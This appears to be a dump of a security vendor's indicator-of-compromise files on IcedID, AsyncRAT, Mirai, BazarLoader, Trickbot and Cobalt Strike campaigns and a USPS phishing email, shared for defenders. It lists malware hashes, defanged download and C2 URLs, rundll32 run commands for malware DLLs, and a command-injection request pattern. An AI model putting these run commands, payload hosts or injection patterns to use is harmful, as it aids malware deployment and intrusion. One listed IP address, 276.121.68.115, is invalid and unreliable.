for IcedID infection 52 | - Run method: rundll32.exe [filename],update /i:"GlancePlay\license.dat" 53 | 54 | TRAFFIC GENERATED BY .JS FILE TO RETRIEVE INSTALLER DLL: 55 | 56 | - 172.67.188[.]12 port 80 - banusdona[.]top - GET /222g100/index.php 57 | - 172.67.188[.]12 port 80 - banusdona[.]top - GET /222g100/main.php 58 | 59 | TRAFFIC GENERATED BY INSTALLER DLL TO RETRIEVE FAKE GZIP FILE USED TO CREATE ICEDID FILES: 60 | 61 | - port 443 - aws.amazon.com - HTTPS traffic 62 | - 104.236.115[.]181 port 80 - momenturede[.]fun - GET / 63 | 64 | C2 TRAFFIC GENERATED BY ICEDID: 65 | 66 | - 83.97.20[.]176 port 443 - odichaly[.]space - HTTPS traffic 67 | - 83.97.20[.]176 port 443 - ameripermanentno[.]website - HTTPS traffic 68 | - 83.97.20[.]176 port 443 - mazzappa[.]fun - HTTPS traffic 69 | - 83.97.20[.]176 port 443 - vaccnavalcod[.]website - HTTPS traffic 70 | 71 | OTHER ICEDID C2 DOMAINS ON 83.97.20[.]176: 72 | 73 | - daserwewlollipop[.]club 74 | - chajkovsky[.]space 75 | - ohbluebennihill[.]website 76 | - seconwowa[.]cyou 77 | - violonchelistto[.]space -------------------------------------------------------------------------------- /2021-04-12-IcedID-malware-and-artifacts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-04-12-IcedID-malware-and-artifacts.zip -------------------------------------------------------------------------------- /2021-04-15-IOCs-for-AsyncRAT-activity.txt: -------------------------------------------------------------------------------- 1 | 2021-04-15 (THURSDAY) - ASYNC RAT FROM MALICIOUS EMAIL 2 | 3 | HEADERS FROM EMAIL: 4 | 5 | Received: from se4p-iad1.servconfig.com ([199.250.217.29]) 6 | by [recipient's mail server] with SMTP (Postfix) 7 | for [recipient's email address]; 8 | Thu, 15 Apr 2021 14:03:28 +0000 (UTC) 9 | Received: from ecres227.servconfig.com ([198.46.81.27]) 10 | by se4-iad1.servconfig.com with esmtps 
(TLSv1.2:AES128-GCM-SHA256:128) 11 | (Exim 4.92) 12 | (envelope-from ) 13 | id 1lX2ZV-000UqZ-Cu; Thu, 15 Apr 2021 10:02:40 -0400 14 | Received: from [::1] (port=56526 helo=ecres227.servconfig.com) 15 | by ecres227.servconfig.com with esmtpa (Exim 4.94) 16 | (envelope-from ) 17 | id 1lX2YZ-006Q02-DF; Thu, 15 Apr 2021 10:01:19 -0400 18 | Date: Thu, 15 Apr 2021 15:00:57 +0100 19 | From: Lally Kim 20 | To: undisclosed-recipients:; 21 | Subject: Re: PO 439531 22 | 23 | LINK FROM THE EMAIL: 24 | 25 | - hxxps://www.icloud[.]com/iclouddrive/0y1w8aFedVPKnAChlDh74q1KA#P.O%5FFwd_Please_Quote_PO-_PN.pdf 26 | 27 | EXAMPLE OF URL GENERATED BY DOWNLOAD BUTTON FROM ICLOUD PAGE: 28 | 29 | - hxxps://cvws.icloud-content[.]com/B/AXOikGN3oc5WAUAGZzNkMdi23pQ-AVchIErgLqymaw4RhiA0hDjMY8d0/P.O_Fwd%20Please%20Quote%20PO-%20PN.pdf.vbs?o=AvzyZUU9GdhpHVUGh19IdH2ZUwGGR6byEYBd4Fn4FkAi&v=1&x=3&a=CAogDzqsgCF7VJVM7FrbFFhtMjha4Pg2xkQIHr2GuHMtGxkSbxCMx-CvjS8YjKS8sY0vIgEAUgS23pQ-WgTMY8d0aidINkqvFGxQ2fS2aE6tM_gcTuok98BYPIJBF7CnRDYaGrVynSrMIxdyJ2U3oImUdrSTKcYDkvfFQhsQfnemAHYOdq1mV7Yi6KK09xOFmrXPgA&e=1618501112&fl=&r=728fabb0-ddb5-49de-9dc4-421c25a9ef49-1&k=j9MouszrGKnqm3G-G8uHuA&ckc=com.apple.clouddocs&ckz=com.apple.CloudDocs&p=20&s=iXtyJgVpxnSJK0ZapnJ_zuSf3fY&%20=29b68b60-44d3-4d82-8672-0aed6659043e 30 | 31 | DOWNLOADED MALWARE VBS FILE: 32 | 33 | - SHA256 hash: 3822efcf4cc76e1e0e8855d9f9c9ab5c236e118bf14fb004a9f048aa845de967 34 | - File size: 138,719 bytes 35 | - File name: P.O_Fwd Please Quote PO- PN.pdf.vbs 36 | - File description: VBS installer for Async RAT 37 | 38 | POWERSHELL SCRIPT FOR ASYNC RAT: 39 | 40 | - SHA256 hash: 323a3dc7c54ac8653019de489d1411647d0a5c486d4cde836fa03fbab852be79 41 | - File size: 96,744 bytes 42 | - File location: C:\Users\[username]\AppData\Roaming\Temp\SysTray.PS1 43 | - File description: Powershell script for Async RAT 44 | - Note: This is run through a Windows shortcut in the startup menu. 
45 | 46 | IP ADDRESSES, TCP PORTS, AND DOMAINS ASSOCIATED WITH THIS ASYNCRAT MALWARE SAMPLE: 47 | 48 | - 5.62.58[.]11 port 8989 - Asin8989.ddns[.]net 49 | - 5.62.58[.]11 port 8988 - asin8988.ddns[.]net 50 | - 79.134.225[.]119 port 8989 - Asin8989.ddns[.]net 51 | - 79.134.225[.]119 port 8988 - asin8988.ddns[.]net 52 | - 197.210.71[.]132 port 8989 - Asin8989.ddns[.]net 53 | - 197.210.71[.]132 port 8988 - asin8988.ddns[.]net 54 | - 5.62.56[.]39 port 8988 - asin8988.ddns[.]net 55 | - 5.62.56[.]39 port 8989 - Asin8989.ddns[.]net 56 | - 5.62.56[.]37 port 8988 - asin8988.ddns[.]net 57 | - 5.62.56[.]37 port 8989 - Asin8989.ddns[.]net -------------------------------------------------------------------------------- /2021-04-26-IcedID-with-Cobalt-Strike-IOCs.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-04-26-IcedID-with-Cobalt-Strike-IOCs.txt -------------------------------------------------------------------------------- /2021-04-26-IcedID-with-Cobalt-Strike-malware-and-artifacts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-04-26-IcedID-with-Cobalt-Strike-malware-and-artifacts.zip -------------------------------------------------------------------------------- /2021-04-26-IcedID-with-Cobalt-Strike-traffic.pcap.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-04-26-IcedID-with-Cobalt-Strike-traffic.pcap.zip -------------------------------------------------------------------------------- /2021-05-10-IOCs-for-TA551-pushing-IcedID.txt: -------------------------------------------------------------------------------- 1 | 2021-05-10 (MONDAY) - TA551 (SHATHAK) WORD DOC PUSHES 
ICEDID (BOKBOT) 2 | 3 | LINK TO MALWARE SAMPLES: 4 | 5 | - https://github.com/pan-unit42/tweets/blob/master/2021-05-10-TA551-IcedID-malware-and-artifacts.zip 6 | 7 | CHAIN OF EVENTS: 8 | 9 | malspam --> password-protected ZIP archive --> extracted Word doc --> enable macros --> initial DLL --> follow-up binary used in gziploader process --> IcedID DLL and follow-up C2 activity 10 | 11 | REFERENCE: 12 | 13 | - https://www.binarydefense.com/icedid-gziploader-analysis/ 14 | 15 | ASSOCIATED MALWARE: 16 | 17 | - SHA256 hash: ad0df2dfd749f0d84f7fc56204e1001307183575ebb488d99fcf4da7a46a8ef6 18 | - File size: 47,659 bytes 19 | - File name: input-05.010.2021.doc 20 | - File description: malicious Word doc with macros for IcedID 21 | 22 | - SHA256 hash: 5c66856fbf859169f1788c63a788e09e003219ace7142ed0a3244d36cac2d008 23 | - File size: 52,824 bytes 24 | - File location: hxxp://policearellanoz[.]com/dgsos/hPpvERy/xaH0HecVHbhNn1wk5c1LEGmNqWEEfXu3tbWeWACS/zuz2?time=smx0I8sp&=bombw1eGaN3ykyPpIE0lxVzVyIXgWS&=KD5hanf9uOyixXA&eqJKEGY5=rlydjAsOmUGoc0&q=8UW7Z5lTNXBOgQd0DB82ByQ0pziw&XFQDO2rSjJ=xrkrYFWM1W8u2K2&4elNlNrKy=L2aWxu9d&q=fOPCCgSxr1uIiPZBhUea0YzTxePJtp&cid=I0btT6cd9veKcyJ9f6E22tuuNxc7&time=ZvyBHpHKm 25 | - File location: C:\ProgramData\linkABuffer.jpg 26 | - File description: Initial DLL acting as loader for IcedID 27 | - Run method: rundll32 c:\programdata\linkABuffer.jpg,PluginInit 28 | 29 | - SHA256 hash: b35e993d9a9bb9f8f7e0a38cceba7e8808480e701fa7a723e9294446acb4ea0f 30 | - File size: 376,158 bytes 31 | - File location: hxxp://dupperawergo[.]top/ 32 | - File description: Fake gzip binary used in gziploader process to install IcedID 33 | 34 | - SHA256 hash: 29d2a8344bd725d7a8b43cc77a82b3db57a5226ce792ac4b37e7f73ec468510e 35 | - File size: 341,098 bytes 36 | - File location: C:\Users\system.administrator\AppData\Roaming\BrightBike\license.dat 37 | - File description: encoded binary used to run IcedID DLL listed below. 
38 | 39 | - SHA256 hash: bdfd7e4b148540b06cb722de7072d04381d2a3a90dcdc1cd51fe5bd16fdd8b10 40 | - File size: 34,304 bytes 41 | - File location: C:\Users\[username]\AppData\Local\Azad\qahaumsp.dll 42 | - File description: IcedID DLL persistent on infected Windows host 43 | - Run method: rundll32.exe "C:\Users\[username]\AppData\Local\Azad\qahaumsp.dll",update /i:"BrightBike\license.dat" 44 | 45 | TRAFFIC CAUSED BY ENABLING MACROS ON WORD DOC: 46 | 47 | - 45.142.215[.]173 port 80 - policearellanoz[.]com - GET /dgsos/hPpvERy/xaH0HecVHbhNn1wk5c1LEGmNqWEEfXu3tbWeWACS/zuz2?time=smx0I8sp&=bombw1eGaN3ykyPpIE0lxVzVyIXgWS&=KD5hanf9uOyixXA&eqJKEGY5=rlydjAsOmUGoc0&q=8UW7Z5lTNXBOgQd0DB82ByQ0pziw&XFQDO2rSjJ=xrkrYFWM1W8u2K2&4elNlNrKy=L2aWxu9d&q=fOPCCgSxr1uIiPZBhUea0YzTxePJtp&cid=I0btT6cd9veKcyJ9f6E22tuuNxc7&time=ZvyBHpHKm 48 | 49 | TRAFFIC CAUSED BY INSTALLER DLL: 50 | 51 | - port 443 - aws.amazon.com - HTTPS traffic 52 | - 194.5.249[.]103 port 80 - dupperawergo[.]top - GET / 53 | 54 | ICEDID C2 TRAFFIC: 55 | 56 | - 83.97.20[.]254 port 443 - zasatava[.]top - IcedID C2 HTTPS traffic 57 | - 83.97.20[.]254 port 443 - defliressisto[.]top - IcedID C2 HTTPS traffic 58 | - 83.97.20[.]254 port 443 - luppotuppo[.]top - IcedID C2 HTTPS traffic 59 | -------------------------------------------------------------------------------- /2021-05-10-TA551-IcedID-malware-and-artifacts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-05-10-TA551-IcedID-malware-and-artifacts.zip -------------------------------------------------------------------------------- /2021-05-17-TA551-IcedID-malware-and-artifacts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-05-17-TA551-IcedID-malware-and-artifacts.zip 
-------------------------------------------------------------------------------- /2021-06-07-Mirai-IOCs.md: -------------------------------------------------------------------------------- 1 | IOCs 2 | 3 | | URL | SHA-256 | 4 | |:-------------:|------:| 5 | | 212[.]192.241.72/bins/dark.arm5 | 4b745539ee696697a465a86a8f9f70d89c35ddbeef0a0f3244e2d3fe65b43b01 | 6 | | 212[.]192.241.72/bins/dark.arm5 | fd22a14e31f6675c50b5c57fdaa09fcf466a39b2eb6fccb546c419aa4064a96d | 7 | | 212[.]192.241.72/bins/dark.arm6 | 03ba8eaacbff2ae82b2f834b47fc055127733116eb7ed6a95fc3cbfa243135ef | 8 | | 212[.]192.241.72/bins/dark.arm6 | 9df3df2e35a6ebc669dc84a04dc8ceacd26ac2d92e3358061448a0d69d1c0b03 | 9 | | 212[.]192.241.72/bins/dark.arm7 | 75612082a5eb445067fc4e8ba155b13d07786930e1f1528ded4228294ff84c0d | 10 | | 212[.]192.241.72/bins/dark.arm7 | e93b82e208d59b4d3655437a124fc48045e90897a5854c2f9b77cca909c7b1d0 | 11 | | 212[.]192.241.72/bins/dark.m68k | b15a302c698a454548c42c144a23da4435db2423100416adfb52bd75794dce01 | 12 | | 212[.]192.241.72/bins/dark.m68k | c22292b2a99aa62865bdcb961be4ca9d4605c04359373af5122693265d7664fc | 13 | | 212[.]192.241.72/bins/dark.mips | 04d2b1479280a2633f570d36645a0d9a79ec4082d9a45d371a46dcf02e40866f | 14 | | 212[.]192.241.72/bins/dark.mips | 8b028d9bba07127393e17147420348012000cf1b877d4e9544476ac7d23921af | 15 | | 212[.]192.241.72/bins/dark.mpsl | 2f3a427e041122bdb02364b0a15568262dfc27a509f4962fe5a334cc872863e1 | 16 | | 212[.]192.241.72/bins/dark.mpsl | 701e8e574a0dd36e0c28628721496a57a48f94e49a60b354520f7127da76b6f1 | 17 | | 212[.]192.241.72/bins/dark.ppc | 25fcefa76d1752b40b33f353332ddb48b3bae529f0af24347ffeffc5e1acd5cd | 18 | | 212[.]192.241.72/bins/dark.ppc | e27d03679f4dc02cc32230c782ed6883af0086220817bf0d4578e5aa0ffc43c2 | 19 | | 212[.]192.241.72/bins/dark.sh4 | 1eeddcaa24d935c4d5463b46902726e4d23c6746493c5734b693bae71b6b613a | 20 | | 212[.]192.241.72/bins/dark.spc | 30aacb60ab0c7f0440d166bd7993d576ef37b0ee8ecd71a707f57be29d9b75e4 | 21 | | 
212[.]192.241.72/bins/dark.x86 | 08efaafd5ca09611ecde73d48a4f3eef20e55c715c0d6a1e9f4c274c31e75ee5 | 22 | | 212[.]192.241.72/bins/dark.x86 | 483f452d2ccf44866dbb42a7cf5213a666eed57b6e78fca8db32861452f94cb2 | 23 | 24 | Vulnerabilities targeted: 25 | * CVE-2021-1497 Cisco HyperFlex HX Command Injection 26 | 27 | * Unidentified vulnerability 28 | ``` 29 | GET enable=aaa;[payload] 30 | ``` 31 | 32 | * CVE-2021-31755 Tenda AC11 Router RCE 33 | 34 | * OptiLink ONT1GEW GPON Router RCE 35 | 36 | * CVE-2009-4487 nginx 0.7.64 Terminal Escape Sequence in Logs Command Injection 37 | 38 | * CVE-2020-28188 TerraMaster TOS RCE 39 | 40 | * CVE-2020-26919 Netgear ProSAFE RCE 41 | 42 | * CVE-2021-25502 Micro Focus Operation Bridge Reporter (OBR) RCE 43 | 44 | * Unidentified vulnerability previously seen and reported [here](https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/) 45 | 46 | * CVE-2020-25506 D-Link DNS-320 Firewall RCE 47 | 48 | * VisualDoor SonicWall SSL-VPN RCE 49 | 50 | * CVE-2021-27561 & CVE-2021-27562 Yealink Device Management Pre-Auth ‘root’ Level RCE 51 | 52 | Previous research on the same variant: https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ 53 | -------------------------------------------------------------------------------- /2021-07-20-IOCs-for-BazarLoader-and-Trickbot.txt: -------------------------------------------------------------------------------- 1 | 2021-07-20 (TUESDAY) - BAZARLOADER FROM STOLEN IMAGES EVIDENCE.ZIP 2 | 3 | CHAIN OF EVENTS: 4 | 5 | - Email --> Link --> Stolen Images Evidence.zip --> Stolen Images Evidence.js --> BazarLoader DLL --> Bazar C2 traffic --> Trickbot gtag mod8 6 | 7 | ASSOCIATED MALWARE: 8 | 9 | - SHA256 hash: 11f4063c74834acada62284c1c3d5bacf4aebb82cae57e2d07fb7477f1fc4be7 10 | - File size: 6,110 bytes 11 | - File name: Stolen Images Evidence.zip 12 | - File description: Downloaded ZIP archive from link in email 13 | 14 | - SHA256 hash: 
99b33d046b950bfe1d39e73d6ca0a1c071a0653b979094a8680da8ad22604e90 15 | - File size: 21,572 bytes 16 | - File name: Stolen Images Evidence.js 17 | - File description: JS file extracted from downloaded ZIP archive 18 | 19 | - SHA256 hash: 82c4c174ad1822ac3c1a55b2e08e9987a9be2294f46508318e50f70566beab5c 20 | - File size: 1,091,079 bytes 21 | - File location: hxxp://menoiras[.]space/222g100/main.php 22 | - File location: C:\Users\[username]\AppData\Roaming\Temp\DRQxZrK.dat 23 | - File description: BazarLoader DLL retrieved by Stolen Images Evidence.js 24 | - Run method: rundll32.exe [filename],StartW 25 | 26 | - SHA256 hash: 8eb708fb8f044596b841b47c2d75f6c02f878f5685b75008084c70752b961d15 27 | - File size: 380,928 bytes 28 | - File location: C:\Users\[username]\AppData\Local\Temp\59FC.dll 29 | - File location: C:\Users\[username]\AppData\Roaming\aeygwtpv.nao 30 | - File description: Trickbot as follow-up malware from BazarLoader infection (gtag mod8) 31 | - Run method: rundll32.exe [filename],StartW 32 | 33 | - SHA256 hash: ade2a738f75f052722923641168d0b3862981e0dd23b31834c1520123a73be49 34 | - File size: 655,360 bytes 35 | - File location: C:\Users\[username]\AppData\Local\Temp\DDA9.dll 36 | - File description: Another binary for Trickbot as follow-up malware from BazarLoader infection (gtag mod8) 37 | - Run method: rundll32.exe [filename],StartW 38 | 39 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 40 | 41 | STOLEN IMAGES EVIDENCE.JS RETRIEVES BAZARLOADER DLL: 42 | 43 | - 104.21.8[.]76 port 80 - hxxp://menoiras[.]space/222g100/index.php 44 | - 104.21.8[.]76 port 80 - hxxp://menoiras[.]space/222g100/main.php 45 | 46 | BAZAR C2 TRAFFIC: 47 | 48 | - 3.16.22[.]120 port 443 - hxxps://twenzim[.]com/www/html/generic 49 | - 3.233.192[.]20 port 443 - hxxps://saltraw[.]com/www/html/generic 50 | 51 | TRICKBOT C2 TRAFFIC: 52 | 53 | - port 443 - ident.me - IP address check (not inherently malicious) 54 | - 103.105.254.17 port 443 - HTTPS traffic 55 | - 190.144.10.242 port 443 - HTTPS 
traffic 56 | - 194.135.33.220 port 443 - 194.135.33.220:443 - POST /mod8/[string identifying infected host]/83/ 57 | - 94.140.114.239 port 443 - 94.140.114.239:443 - POST /mod8/[string identifying infected host]/83/ 58 | - 194.15.113.73 port 443 - 194.15.113.73:443 - POST /mod8/[string identifying infected host]/83/ 59 | - 5.181.80.128 port 443 - 5.181.80.128:443 - POST /mod8/[string identifying infected host]/83/ 60 | - 45.86.65.164 port 443 - 45.86.65.164:443 - POST /mod8/[string identifying infected host]/83/ 61 | -------------------------------------------------------------------------------- /2021-07-26-Trickbot-gtag-rob112.txt: -------------------------------------------------------------------------------- 1 | 2021-07-26 (MONDAY) - TRICKBOT GTAG ROB112 2 | 3 | EMAIL HEADERS: 4 | 5 | - Received: from o2.p8.mailjet.com ([87.253.233.2]) [info removed]; Mon, 26 Jul 2021 10:34:34 -0700 6 | - Subject: Order Confirmation 83864 7 | - Date: Mon, 26 Jul 2021 18:34:18 +0100 8 | - Message-Id: <01b809de.AMwAAKoqBuIAAAAAAAAAALKImNcAAR0rOK4AAAAAAAZC2QBg_vIj@mailjet.com> 9 | 10 | ASSOCIATED MALWARE: 11 | 12 | - SHA256 hash: 8f421ddf0df678fe1c22460e0fa3a10c7c48112197917e3843c5674ffe429503 13 | - File size: 741,635 bytes 14 | - File name: details_5908.zip 15 | - File description: Malicious ZIP archive attached to email 16 | 17 | - SHA256 hash: 7559493fd22c60217b62790fa4576988396967b597cade92f288ef39335bee3b 18 | - File size: 1,231,703 bytes 19 | - File name: details_5908.js 20 | - File description: Malicious JS file retrieved from above ZIP archive 21 | 22 | - SHA256 hash: 6e057855e21f4c93a4e3825b9711ca07ccec94fed55dbc20e1d3316b2b3dc549 23 | - File size: 632,320 bytes 24 | - File location: hxxps://docs.zohopublic[.]eu/downloaddocument.do?docId=674ni225458b03d204b4ab290dc0afd57ec8c&docExtn=pdf 25 | - File location: C:\Users\[username]\AppData\Local\Temp\wfhG.bin 26 | - File location: C:\Users\[username]\AppData\Roaming\wise-toolsZ7RZBV\hbwfhGzt.grf 27 | - File description: DLL for 
Trickbot gtag rob112 28 | - Run method: Rundll32.exe [filename],StartW 29 | 30 | INFECTION TRAFFIC: 31 | 32 | - 192.185.150[.]20 port 80 - hxxp://netvalleykenya[.]com/crm.php 33 | - 213.244.146[.]19 port 443 - hxxps://docs.zohopublic[.]eu/downloaddocument.do?docId=674ni225458b03d204b4ab290dc0afd57ec8c&docExtn=pdf 34 | - 38.110.103[.]18 port 443 - hxxps://38.110.103[.]18/rob112/[long string] 35 | - 38.110.103[.]19 port 443 - hxxps://38.110.103[.]19/rob112/[long string] 36 | - 38.110.100[.]33 port 443 - hxxps://38.110.100[.]33/rob112/[long string] 37 | - 38.110.103[.]124 port 443 - hxxps://38.110.103[.]124/rob112/[long string] 38 | - 38.110.103[.]136 port 443 - hxxps://38.110.103[.]136/rob112/[long string] 39 | - 80.15.2[.]105 port 443 - hxxps://80.15.2[.]105/rob112/[long string] 40 | - 94.140.114[.]239 port 443 - hxxp://94.140.114[.]239:443/rob112/[long string] 41 | - 190.144.10[.]242 port 443 - hxxps://190.144.10[.]242/rob112/[long string] 42 | - 194.135.33[.]220 port 443 - hxxp://194.135.33[.]220:443/rob112/[long string] 43 | -------------------------------------------------------------------------------- /2021-07-29-IOCs-for-BazarLoader-CobaltStrike-PrintNightmare.txt: -------------------------------------------------------------------------------- 1 | 2021-07-29 (THURSDAY) - STOLEN IMAGES EVIDENCE.ZIP --> BAZARLOADER --> COBALT STRIKE --> PRINTNIGHTMARE 2 | 3 | NOTES: 4 | 5 | - We have evidence of this campaign starting as early as November 2020. 6 | 7 | - This campaign previously pushed IcedID (Bokbot) malware as described here: 8 | https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/ 9 | 10 | - This campaign switched from IcedID and began pushing BazarLoader in early July 2021. 
Reference: 11 | https://twitter.com/malware_traffic/status/1412470165179092992 12 | 13 | - We continue to see BazarLoader from this campaign followed by Cobalt Strike, which can lead to other malicious activity as seen here. 14 | 15 | CHAIN OF EVENTS: 16 | 17 | - Email --> Link --> Stolen Images Evidence.zip --> Stolen Images Evidence.js --> BazarLoader DLL --> Bazar C2 traffic --> Cobalt Strike --> follow-up malware including PrintNightmare 18 | 19 | DOWNLOADED ZIP AND EXTRACTED .JS FILE: 20 | 21 | - b2a996a9301cdb9f19dec6105880aa5530758cc29347c389de48c15728cad25d Stolen Images Evidence.zip 22 | - 88d4d3f48bd23543980b70b5a78606d80c2917bfcd960991eb9a8ddf6ac58ed2 Stolen Images Evidence.js 23 | 24 | BAZARLOADER DLL: 25 | 26 | - SHA256 hash: 37065b2a4cdaec2b1a260b39738746cb45895bd6d508e7aa5e4013e94abc6196 27 | - Location: C:\Users\[username]\AppData\Local\Temp\miFrRGoM.dat 28 | - Run method: rundll32.exe [filename],StartW 29 | 30 | COBALT STRIKE BINARIES: 31 | 32 | - SHA256 hash: bab8196c3630b25a0dc1c21303881e0dc4d1f560655b7f86e6986c9eb84ae946 33 | - Location: C:\Users\[username]\Downloads\162_64.exe 34 | 35 | - SHA256 hash: 087153ed5bb9bb9807e37a8fd745a16a634497a842896f232ab4cfb54197ba00 36 | - Location: C:\Users\[username]\Downloads\162_64.dll 37 | - Run method: regsvr32.exe 162_64.dll 38 | 39 | POWERSHELL SCRIPT FOR PRINTNIGHTMARE: 40 | 41 | - SHA256 hash: a1e737140c474872759add27ef45f0d9772fcb32c48aabd82d6d4055ccbfafb9 42 | - Location: C:\Users\[username]\Downloads\1675.ps1 43 | 44 | OTHER MALICIOUS FILES: 45 | 46 | - SHA256 hash: 51ddba2bfdccb9ae4e640ae2fa67594e51cc4303a2e8cefe5afde33cc2a37976 47 | - Location: C:\Users\[username]\Downloads\starterO.exe 48 | 49 | - SHA256 hash: b3af3e97b503df85ee940044eb64ad482698bde256feee054d97879eac53780b 50 | - Location: C:\Users\[username]\Downloads\starterOF.exe 51 | 52 | TRAFFIC GENERATED BY STOLEN IMAGES EVIDENCE.JS: 53 | 54 | - 172.67.181[.]157 port 80 - munardis[.]space - GET /222g100/index.php HTTP/1.1 55 | - 
172.67.181[.]157 port 80 - munardis[.]space - GET /222g100/main.php HTTP/1.1 56 | 57 | BAZAR C2 TRAFFIC: 58 | 59 | - hxxps://195.123.233[.]106/anchor/south 60 | - hxxps://13.52.241[.]196/anchor/south 61 | 62 | COBALT STRIKE TRAFFIC: 63 | 64 | - 31.14.40[.]172 port 443 - postformt[.]com - Client Hello (HTTPS traffic) 65 | - 162.244.80[.]46 port 80 - loikdo[.]com - GET /components/mt.ico HTTP/1.1 66 | - 162.244.80[.]46 port 80 - loikdo[.]com - GET /copyright.js?terms=false HTTP/1.1 67 | - 162.244.80[.]46 port 80 - loikdo[.]com - POST /xmlconnect HTTP/1.1 (text/plain) 68 | 69 | NOTES: 70 | 71 | - postformt[.]com reported as Cobalt Strike by @mojoesec on 2021-07-20 at: 72 | https://twitter.com/mojoesec/status/1417574273988931585 73 | 74 | - loikdo[.]com reported as Cobalt Strike by @mojoesec on 2021-07-29 at: 75 | https://twitter.com/bryceabdo/status/1420839047426084869 76 | But HTTP traffic patterns also indicate this is Cobalt Strike. -------------------------------------------------------------------------------- /2021-08-09-BazarLoader-and-Cobalt-Strike-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2021-08-09 (MONDAY) - STOLEN IMAGES EVIDENCE.ZIP --> BAZARLOADER --> COBALT STRIKE 2 | 3 | CHAIN OF EVENTS: 4 | 5 | Email --> Link --> Stolen Images Evidence.zip --> Stolen Images Evidence.js --> BazarLoader DLL --> Bazar C2 traffic --> Cobalt Strike 6 | 7 | ASSOCIATED MALWARE: 8 | 9 | - SHA256 hash: a0b802b97f4fcdac9f0b4ae27a3623f353890fa4dd8de47aceb82d7612be95da 10 | - File size: 7,077 bytes 11 | - File name: Stolen Images Evidence.zip 12 | - File description: 13 | 14 | - SHA256 hash: 4dae02681b1017f1812bcb4d2a76287b1f4f3c1875ffbd17a8fc0a8b63841a00 15 | - File size: 20,031 bytes 16 | - File name: Stolen Images Evidence.js 17 | - File description: 18 | 19 | - SHA256 hash: 2bd7a2153ce51e2a0e9b1f197c51ee7eab05f5bb46fbaffe53294d18be89969b 20 | - File size: 989,194 bytes 21 | - File location: 
hxxp://vagenor[.]space/333g100/main.php 22 | - File location: C:\Users\[username]\AppData\Local\Temp\RyqXLe.dat 23 | - File description: Malware DLL for BazarLoader (BazaLoader) 24 | - Run method: rundll32.exe [filename],StartW 25 | 26 | - SHA256 hash: 6eccc2f0b5fb42a7b59881acdef621cc086d6ab76dfd80e5a3b3542590197805 27 | - File size: 475,648 bytes 28 | - File location: C:\Users\[username]\AppData\Local\Temp\E5A2.dll 29 | - File description: Malware DLL for Cobalt Strike 30 | - Run method: rundll32.exe [filename],Entrypoint 31 | 32 | 33 | TRAFFIC GENERATED BY EXTRACTED .JS FOR BAZARLOADER DLL: 34 | 35 | - 172.67.128[.]34 port 80 - hxxp://vagenor[.]space/333g100/index.php 36 | - 172.67.128[.]34 port 80 - hxxp://vagenor[.]space/333g100/main.php 37 | 38 | BAZAR C2 TRAFFIC: 39 | 40 | - hxxps://161.35.144[.]15/issue/web 41 | - hxxps://161.35.152[.]48/issue/web 42 | 43 | COBALT STRIKE TRAFFIC: 44 | 45 | - 23.82.19[.]173 port 443 - yuxicu[.]com - HTTPS traffic 46 | - 23.106.215[.]61 port 443 - gojihu[.]com - HTTPS traffic -------------------------------------------------------------------------------- /2021-08-18-phishing-example.txt: -------------------------------------------------------------------------------- 1 | 2021-08-18 - PHISHING EMAIL SPOOFING US POSTAL SERVICE 2 | 3 | EMAIL HEADERS: 4 | 5 | Received: from hosting.swin.net.id ([103.11.134.180]) 6 | by [recipient's mail server] with SMTP (Postfix) 7 | for [recipient's email address]; 8 | Wed, 18 Aug 2021 14:44:03 +0000 (UTC) 9 | Received: from heritage by arjuna.capoeng.net with local (Exim 4.94.2) 10 | (envelope-from ) 11 | id 1mGMnT-00053F-8l 12 | for [recipient's email address]; Wed, 18 Aug 2021 21:44:03 +0700 13 | To: [recipient's email address] 14 | Subject: Your shipment is waiting to be delivered. 
15 | Date: Wed, 18 Aug 2021 21:44:03 +0700 16 | From: "USPS.COM" 17 | Content-Type: multipart/alternative; 18 | boundary="b1_2a0b903f0a40c63d0a2965edfd2dfda1" 19 | Content-Transfer-Encoding: 8bit 20 | 21 | LINK FROM MESSAGE TEXT: 22 | 23 | - hxxps://usps-delivery-support.logitel[.]com[.]au/update/ 24 | 25 | NOTES: 26 | 27 | - Link from email is HTTPS, but it worked as an HTTP URL. 28 | - 276.121.68[.]115 - usps-delivery-support.logitel[.]com[.]au 29 | - Most browsers (Chrome/Edge/Firefox) are currently flagging this URL. -------------------------------------------------------------------------------- /2021-08-26-IOCs-for-DDoS-themed-BazarLoader-infection.txt: -------------------------------------------------------------------------------- 1 | 2021-08-26 (THURSDAY) - "DDOS ATTACK PROOF" FORM EMAILS PUSH BAZARLOADER (BAZALOADER) 2 | 3 | NOTES: 4 | 5 | - We have evidence of this campaign starting as early as November 2020. 6 | 7 | - This "Stolen Images Evidence" campaign previously pushed IcedID as described here: https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/ 8 | 9 | - "Stolen Images Evidence" switched from IcedID to BazarLoader by early July 2021: https://twitter.com/malware_traffic/status/1412470165179092992 10 | 11 | - As recently as 2021-08-16, the "Stolen Images Evidence" campaign switched to a "DDoS Attack Proof" theme: https://twitter.com/mesa_matt/status/1430974685110587395 12 | 13 | - Otherwise, "DDoS Attack Proof" follows the same infection patterns as "Stolen Images Evidence" and should be considered the same threat actor. 
